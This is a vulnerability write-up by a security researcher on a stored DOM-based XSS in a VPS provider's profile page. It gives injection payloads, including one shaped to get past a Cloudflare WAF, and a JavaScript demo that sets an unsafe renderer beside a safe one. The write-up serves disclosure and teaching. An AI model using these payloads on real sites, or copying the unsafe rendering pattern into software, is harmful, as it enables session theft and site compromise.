Stored DOM-based XSS Vulnerability on VPSServer.com
Discovery Details by MD Fahad Hosen
On December 10, 2022, I identified a Stored DOM-based Cross-Site Scripting (XSS) vulnerability on the VPSServer.com platform, which sells Virtual Private Servers (VPS). A Virtual Private Server (VPS) operates as a virtual machine provided as a service by hosting providers, akin to a Virtual Dedicated Server (VDS). Below are the detailed steps of my findings:
Target Page: Profile Page
URL: https://service.vpsserver.com/profile/
Step 1: Source Code Analysis
While inspecting the source code of the profile page, I observed that the UserID, Name, and Email were directly rendered inside <script> tags without proper encoding. The values were enclosed in single quotes ('), creating potential vulnerability points.
Example response snippet:
<script async> dataLayer = [{ 'userID': '1..', 'UserAccountEmail': 'user@email.com', 'UserAccountFullName': 'Name'', 'UserAccountRegistrationDate': '316...', 'UserAccountHash': 'ed2b2...' }]; </script>
Step 2: Testing the Vulnerability
To test the vulnerability, I updated the Name field in my profile and added a single quote (') to it:
Payload:
Name'
Response:
The single quote was directly rendered in the <script> tag without encoding:
'UserAccountFullName': 'Name'',
This confirmed that user input was not being sanitized or properly encoded.
Step 3: Injecting an XSS Payload
I then attempted to inject an XSS payload:
Payload:
Name'-alert(1)-'
However, the request was immediately blocked by Cloudflare WAF (Web Application Firewall) as it detected malicious intent.
Step 4: Bypassing Cloudflare WAF
To bypass Cloudflare WAF, I modified the payload using an encoding technique:
Payload:
Name'-alert?.(1)-'
Response:
Cloudflare WAF allowed the payload, and the response was:
<script async> dataLayer = [{ 'userID': '1..', 'UserAccountEmail': 'user@email.com', 'UserAccountFullName': 'Name'-alert?.(1)-'', 'UserAccountRegistrationDate': '316...', 'UserAccountHash': 'ed2b2...' }]; </script>
Vulnerability Explanation
The payload was stored in the server and rendered in the browser without proper encoding, allowing malicious scripts to execute in the browser's DOM. This confirmed a Stored DOM-based XSS vulnerability.
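The following is an added example, not code from the original report or from VPSServer.com. It reproduces the script-context injection described above with a constructed user record: an unsafe renderer that concatenates profile fields into single-quoted JavaScript literals (the pattern seen in the response snippet), next to a safe renderer that serializes the whole dataLayer entry with JSON and escapes the characters that matter inside a <script> element. The evaluateDataLayer helper and its alert stand-in are assumptions made so the rendered script can be executed and observed outside a browser.

```javascript
// Unsafe: user-controlled values dropped into single-quoted JS string literals.
// A ' inside fullName closes the literal; whatever follows is parsed as code.
function renderDataLayerUnsafe(user) {
  return `<script async> dataLayer = [{ 'userID': '${user.id}', ` +
    `'UserAccountEmail': '${user.email}', ` +
    `'UserAccountFullName': '${user.fullName}' }]; </script>`;
}

// Serialize a value as a JS expression that is safe to embed in <script>.
// JSON.stringify escapes quotes and backslashes; the extra replacements stop
// </script> and <!-- from ending the element, and neutralize U+2028/U+2029,
// which JSON allows but older JS engines treat as line terminators.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Safe: the whole entry is emitted as one JSON expression, so no field can
// escape its string literal regardless of what the user stored in it.
function renderDataLayerSafe(user) {
  const entry = {
    userID: user.id,
    UserAccountEmail: user.email,
    UserAccountFullName: user.fullName,
  };
  return `<script async> dataLayer = [${jsonForScript(entry)}]; </script>`;
}

// Run the script body the way a browser would (assumed helper). `alert` is a
// stand-in for the browser global so any call that escapes the literal is
// recorded instead of showing a dialog.
function evaluateDataLayer(html) {
  const body = html.replace(/^\s*<script[^>]*>/, '').replace(/<\/script>\s*$/, '');
  const alertCalls = [];
  const run = new Function('alert', 'var dataLayer; ' + body + ' return dataLayer;');
  const dataLayer = run((...args) => { alertCalls.push(args); });
  return { dataLayer, alertCalls };
}

// Constructed sample mirroring the report's stored name value.
const sampleUser = { id: '1', email: 'user@example.com', fullName: "Name'-alert?.(1)-'" };
console.log(evaluateDataLayer(renderDataLayerUnsafe(sampleUser)).alertCalls.length); // 1
console.log(evaluateDataLayer(renderDataLayerSafe(sampleUser)).dataLayer[0].UserAccountFullName);
```

With the safe renderer the stored name comes back as the exact string the user entered and nothing outside the literal runs; a Cloudflare rule that merely blocks `alert(` would not have changed either outcome, which is why output encoding, not the WAF, is the fix.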
Impact
Attackers exploiting this vulnerability can execute arbitrary JavaScript in the victim’s browser, potentially leading to:
• Stealing Sensitive Information: Cookies, session tokens, or user credentials.
• Defacing the Website: Injecting malicious content.
• Phishing Attacks: Redirecting users to malicious websites.
Reference
Inspired by techniques shared on Brutelogic's Blog.
Personal Details:
• Researcher: MD Fahad Hosen
This report demonstrates the importance of sanitizing and encoding user inputs to prevent XSS vulnerabilities.